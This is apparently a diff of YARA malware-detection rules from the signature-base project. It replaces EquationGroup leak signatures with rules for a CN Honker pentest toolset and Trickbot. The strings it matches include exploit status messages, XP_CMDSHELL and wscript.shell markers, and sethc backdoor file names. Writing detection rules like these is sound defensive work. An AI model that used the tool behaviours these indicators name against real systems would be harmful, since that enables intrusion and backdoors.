+rule SIGNATURE_BASE_CN_Honker_Layer_Layer : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "225799cf-4d1b-54f8-8b76-b9ee1db80ce7"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1653-L1666"
+		id = "48e27119-da7e-5921-8d4f-f8a1e3ac0439"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2288-L2305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b5eb9d45dfc47470236923a5b8174bc17733e4333db6f8bbe63c4f4bc913cf26"
-		score = 75
+		hash = "0f4f27e842787cb854bd61f9aca86a63f653eb41"
+		logic_hash = "03e2d875de6dc45a0cede55071c071944c4cdf4610f52fe4a21f6dd5dedac41d"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
 
 	strings:
-		$x1 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
+		$s1 = "\\Release\\Layer.pdb" ascii
+		$s2 = "Layer.exe" fullword wide
+		$s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Educatedscholartouch_1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Ms10048_X86 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file ms10048-x86.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62205374-25a3-5b96-ad0a-a82c9a01a242"
-		date = "2017-04-15"
+		id = "5d572d35-d2e5-5457-89d9-fbce8f8fa552"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1668-L1682"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2307-L2321"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4c06fad158db8337ff768ad1553401ec31eee6b0d50333ce91a3a12e79d8981a"
-		score = 75
+		hash = "e57b453966e4827e2effa4e153f2923e7d058702"
+		logic_hash = "2f67b3be31b1d1eb420b40ec291db7271acd692af9f061d5db17415685cf7546"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f4b958a0d3bb52cb34f18ea293d43fa301ceadb4a259d3503db912d0a9a1e4d8"
 
 	strings:
-		$x1 = "[!] A vulnerable target will not respond." fullword ascii
-		$x2 = "[-] Target NOT Vulernable" fullword ascii
+		$s1 = "[+] Set to %d exploit half succeeded" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Esteemaudittouch_2_1_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Htran2_4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bb66245e-1261-50bd-8666-75fc4c52ad84"
-		date = "2017-04-15"
+		id = "21cb5ec5-900d-5092-8c2b-2d951289957c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1684-L1698"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2323-L2338"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f4e62ec7a68115d5ff155ea94fb2c99b9177e928533338a111e531c694ff7b8f"
-		score = 75
+		hash = "524f986692f55620013ab5a06bf942382e64d38a"
+		logic_hash = "dd1332d3dca12513b1f8a1d10148f6fa2eb7cc809ac7cf6f4dcc9090746718b5"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f6b9caf503bb664b22c6d39c87620cc17bdb66cef4ccfa48c31f2a3ae13b4281"
 
 	strings:
-		$x1 = "[-] Touching the target failed!" fullword ascii
-		$x2 = "[-] OS fingerprint not complete - 0x%08x!" fullword ascii
+		$s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
+		$s2 = "[+] New connection %s:%d !!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Rpctouch_2_1_0 : FILE
+rule SIGNATURE_BASE_CN_Honker_Skinhrootkit_Skinh : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - file SkinH.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0691768b-ca98-5722-8468-737c4966d54d"
-		date = "2017-04-15"
+		id = "8aedd01c-9dc8-537d-97ea-bc8de81edd3d"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1700-L1714"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2340-L2356"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3ea1f30c0a2c91cc9ca2eec8eaab167c83f4f52c2732d03d1e7fb99e63986662"
-		score = 75
+		hash = "d593f03ae06e54b653c7850c872c0eed459b301f"
+		logic_hash = "97314a8c908c714c39ea8962c87709fdc422c3e2998a2b1694950fa127204335"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7fe4c3cedfc98a3e994ca60579f91b8b88bf5ae8cf669baa0928508642c5a887"
 
 	strings:
-		$x1 = "[*] Failed to detect OS / Service Pack on %s:%d" fullword ascii
-		$x2 = "[*] SMB String: %s (%s)" fullword ascii
+		$s0 = "(C)360.cn Inc.All Rights Reserved." fullword wide
+		$s1 = "SDVersion.dll" fullword wide
+		$s2 = "skinh.dll" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mofconfig_1_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker__Postgresql_Mysql_Injectv1_1_Creak_Oracle_Sqlserver_Inject_Creaked : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d0d32e19-d004-5941-a5b3-0b4306565cf2"
-		date = "2017-04-15"
+		id = "0272776c-8dbe-5345-92c8-57593686a84c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1716-L1729"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2358-L2378"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a922eb01efa52601b72c3d91a26585504fcf706a9ed16a36328f94f5871b0b24"
-		score = 75
+		logic_hash = "ed809a5fb35d36b2a8758e470657bda1a04d80577d5129962cd7d0ab9a80cf8a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c67a24fe2380331a101d27d6e69b82d968ccbae54a89a2629b6c135436d7bdb2"
+		super_rule = 1
+		hash0 = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
+		hash1 = "a1f066789f48a76023598c5777752c15f91b76b0"
+		hash2 = "0264f4efdba09eaf1e681220ba96de8498ab3580"
+		hash3 = "af3c41756ec8768483a4cf59b2e639994426e2c2"
 
 	strings:
-		$x1 = "[-] Get RemoteMOFTriggerPath error" fullword ascii
+		$s1 = "zhaoxypass@yahoo.com.cn" fullword ascii
+		$s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+		$s3 = "ProxyParams.ProxyPort" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Easypi_Explodingcan : FILE
+rule SIGNATURE_BASE_CN_Honker__Wwwscan_Wwwscan_Wwwscan_Gui : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - from files wwwscan.exe, wwwscan.exe, wwwscan_gui.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "53d4ebf1-cce3-5fc8-8304-064b4113c9d7"
-		date = "2017-04-15"
+		id = "02f80151-4dfb-5b14-9145-312a9bd2c609"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1731-L1747"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2380-L2398"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c5978d8cbffde2339cadd84f44d1df24e76f298a2f05bd9a6565246bfae1b1e3"
-		score = 75
+		logic_hash = "0fd6ab38dca839605c1b7cd51a4a8d3268551f0725ccee7c7521f13d6f9e7076"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dc1ddad7e8801b5e37748ec40531a105ba359654ffe8bdb069bd29fb0b5afd94"
-		hash2 = "97af543cf1fb59d21ba5ec6cb2f88c8c79c835f19c8f659057d2f58c321a0ad4"
+		super_rule = 1
+		hash0 = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
+		hash1 = "6bed45629c5e54986f2d27cbfc53464108911026"
+		hash2 = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
 
 	strings:
-		$x1 = "[-] %s - Target might not be in a usable state." fullword ascii
-		$x2 = "[*] Exploiting Target" fullword ascii
-		$x3 = "[-] Encoding Exploit Payload failed!" fullword ascii
+		$s1 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+		$s2 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eclipsedwingtouch_1_0_4 : FILE
+rule SIGNATURE_BASE_CN_Honker__LPK_LPK_LPK : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - from files LPK.DAT, LPK.DAT, LPK.DAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "87e46fcd-d3e5-506a-97f3-8a18a7ba8042"
-		date = "2017-04-15"
+		id = "e1beb88b-d3e8-5868-affb-e59c26e4dc2e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1749-L1763"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2400-L2421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4707dbbb302b9b2192bdd23e4b64e25b5b2f49c3dd7951905a07cb5b54d524d9"
-		score = 75
+		logic_hash = "0309241ed0e899519cf3edd1544a14d09fff4a8162514ae49b3a6b70eda1ed4f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "46da99d80fc3eae5d1d5ab2da02ed7e61416e1eafeb23f37b180c46e9eff8a1c"
+		super_rule = 1
+		hash0 = "5a1226e73daba516c889328f295e728f07fdf1c3"
+		hash1 = "2b2ab50753006f62965bba83460e3960ca7e1926"
+		hash2 = "cf2549bbbbdb7aaf232d9783873667e35c8d96c1"
 
 	strings:
-		$x1 = "[-] The target is NOT vulnerable" fullword ascii
-		$x2 = "[+] The target IS VULNERABLE" fullword ascii
+		$s1 = "C:\\WINDOWS\\system32\\cmd.exe" fullword wide
+		$s2 = "Password error!" fullword ascii
+		$s3 = "\\sathc.exe" ascii
+		$s4 = "\\sothc.exe" ascii
+		$s5 = "\\lpksethc.bat" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1057KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Iistouch_1_2_2 : FILE
+rule SIGNATURE_BASE_CN_Honker__Builder_Shift_Skinh : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - from files builder.exe, shift.exe, SkinH.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd6ea8cc-505d-5c7c-a7ea-c5fa4f14b5ee"
-		date = "2017-04-15"
+		id = "cb18aa4a-6eba-58ca-a6fc-e4160b90f4d7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1765-L1779"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2423-L2444"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f4f5e17d3777d6ae8bfd0646eeffcd631331e4d8966f5124ebc9352438dc790f"
-		score = 75
+		logic_hash = "d15802df98d72b4ef3bac2dfb8ba3338c540ef7290d7ddf9738cf0f7b86e17ea"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c433507d393a8aa270576790acb3e995e22f4ded886eb9377116012e247a07c6"
+		super_rule = 1
+		hash0 = "6b5a84cdc3d27c435d49de3f68872d015a5aadfc"
+		hash1 = "ee127c1ea1e3b5bf3d2f8754fabf9d1101ed0ee0"
+		hash2 = "d593f03ae06e54b653c7850c872c0eed459b301f"
 
 	strings:
-		$x1 = "[-] Are you being redirectect? Need to retarget?" fullword ascii
-		$x2 = "[+] IIS Target OS: %s" fullword ascii
+		$s1 = "lipboard" fullword ascii
+		$s2 = "uxthem" fullword ascii
+		$s3 = "ENIGMA" fullword ascii
+		$s4 = "UtilW0ndow" fullword ascii
+		$s5 = "prog3am" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 60KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 6075KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Namedpipetouch_2_0_0 : FILE
+rule SIGNATURE_BASE_CN_Honker__Lcx_Htran2_4_Htran20 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - from files lcx.exe, HTran2.4.exe, htran20.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0a5519d7-9811-5159-8df2-0cb2995d5085"
-		date = "2017-04-15"
+		id = "c6851e7b-ab64-5578-896e-4d92fb3b2000"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1781-L1800"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2446-L2465"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "63d4395db4672b7a146dbd285e42344fb895b38f67fa9f7885b73855d7211190"
-		score = 75
+		logic_hash = "30184394ad3ec7bf209bb0a22da889699bac6167ecc09e693c88f8643c754394"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cb5849fcbc473c7df886828d225293ffbd8ee58e221d03b840fd212baeda6e89"
-		hash2 = "043d1c9aae6be65f06ab6f0b923e173a96b536cf84e57bfd7eeb9034cd1df8ea"
+		super_rule = 1
+		hash0 = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
+		hash1 = "524f986692f55620013ab5a06bf942382e64d38a"
+		hash2 = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
 
 	strings:
-		$s1 = "[*] Summary: %d pipes found" fullword ascii
-		$s3 = "[+] Testing %d pipes" fullword ascii
-		$s6 = "[-] Error on SMB startup, aborting" fullword ascii
-		$s12 = "92a761c29b946aa458876ff78375e0e28bc8acb0" fullword ascii
-		$op1 = { 68 10 10 40 00 56 e8 e1 }
+		$s1 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s2 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s3 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 440KB and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Easybee_1_0_1 : FILE
+rule SIGNATURE_BASE_CN_Honker__D_Injection_V2_32_D_Injection_V2_32_D_Injection_V2_32 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Sample from CN Honker Pentest Toolset - from files D_injection_V2.32.exe, D_injection_V2.32.exe, D_injection_V2.32.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f170ed34-f7d1-5eb2-9400-4308b6b39388"
-		date = "2017-04-15"
+		id = "79e9cd97-c070-5109-a0a0-bc88eea0dc37"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1802-L1816"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L2467-L2488"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e3488a1d686b9ad468553cfe2c939e70ea6b9a21409df8b06bb54418495576ec"
-		score = 75
+		logic_hash = "5c318c670b3aedf66da1c6444df7d630d2263e88527facfcf75d76dd974e7d31"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "59c17d6cb564edd32c770cd56b5026e4797cf9169ff549735021053268b31611"
+		super_rule = 1
+		hash0 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+		hash1 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+		hash2 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
 
 	strings:
-		$x1 = "@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"" fullword ascii
-		$x2 = "Logging out of WebAdmin (as target account)" fullword ascii
+		$s1 = "upfile.asp " fullword ascii
+		$s2 = "[wscript.shell]" fullword ascii
+		$s3 = "XP_CMDSHELL" fullword ascii
+		$s4 = "[XP_CMDSHELL]" fullword ascii
+		$s5 = "http://d99net.3322.org" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 4 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Regread_1_1_1 : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99a2b146-a277-5917-9a84-3d396d2c8bf9"
-		date = "2017-04-15"
+		id = "b428cbf9-0796-5a01-9b98-28e1bc6827cc"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1818-L1832"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L3-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5bf833d7fb073ad74037cf6df4729c75d50641a46a962aee8deac19e31b74419"
+		logic_hash = "fef15c0bda6dc2b28f34791da3ca68a03f7368b63ead17e631a2d4f05d1b40e2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
+		hash1 = "58852140a2dc30e799b7d50519c56e2fd3bb506691918dbf5d4244cc1f4558a2"
+		hash2 = "aabf54eb27de3d72078bbe8d99a92f5bcc1e43ff86774eb5321ed25fba5d27d4"
+		hash3 = "9d6e4ad7f84d025bbe9f95e74542e7d9f79e054f6dcd7b37296f01e7edd2abae"
 
 	strings:
-		$s1 = "[+] Connected to the Registry Service" fullword ascii
-		$s2 = "f08d49ac41d1023d9d462d58af51414daff95a6a" fullword ascii
+		$s1 = "Celestor@hotmail.com" fullword ascii
+		$s2 = "\\txtPassword" ascii
+		$s14 = "Invalid Password, try again!" fullword wide
+		$op1 = { 78 c4 40 00 ff ff ff ff b4 47 41 }
+		$op2 = { 9b 68 b2 34 46 00 eb 14 8d 55 e4 8d 45 e8 52 50 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Englishmansdentist_1_2_0 : FILE
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "76367c53-9b48-59a1-9ac9-8649fd833fe3"
-		date = "2017-04-15"
+		id = "2ff69a51-d089-53e5-ab19-4fbdf20f90f8"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1834-L1848"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L24-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd415731c1c8398d2b0b1758c4e7eb3e708620b269f9312cf0a750ab2099162e"
+		logic_hash = "185e59c156218b418bec0c94144b19639c17e3a9595d993e3761eae15379f9fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a6ab28885ad7d5d64ac4c4fb8c619eca3b7fb3be883fc67c90f3ea9251f34c6"
+		hash1 = "57b8ea2870f5176a30e6cba2d717fb3ff342f8bd36bac652dc4194a313b5fa64"
+		hash2 = "d75561a744e3ed45dfbf25fe7c120bd24c38138ac469fd02e383dd455a540334"
 
 	strings:
-		$x1 = "[+] CheckCredentials(): Checking to see if valid username/password" fullword ascii
-		$x2 = "Error connecting to target, TbMakeSocket() %s:%d." fullword ascii
+		$x1 = "C:\\Users\\User\\Desktop\\Encrypt\\Math_Cad\\Release\\Math_Cad.pdb" fullword ascii
+		$x2 = "AxedWV3OVTFfnGb" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize <= 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch : FILE
+
+rule SIGNATURE_BASE_MAL_Trickbot_Oct19_3 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Trickbot malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "df3b0794-cbbd-530c-8425-fdf4b116b870"
-		date = "2017-04-15"
+		id = "3428b7e3-def9-5574-bbbb-6ba98c134dec"
+		date = "2019-10-02"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1850-L1870"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_trickbot.yar#L40-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "faeac75104a15cac8528663a82eadbc7bc22cc0a1d1a3b3dfccb6ea46fb24a67"
+		logic_hash = "87860212077b63bf3e4835a3a64b934fc7edd3258355a3e94a69acaba39c2516"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
-		hash2 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
-		hash3 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
+		hash1 = "25a4ae2a1ce6dbe7da4ba1e2559caa7ed080762cf52dba6c8b55450852135504"
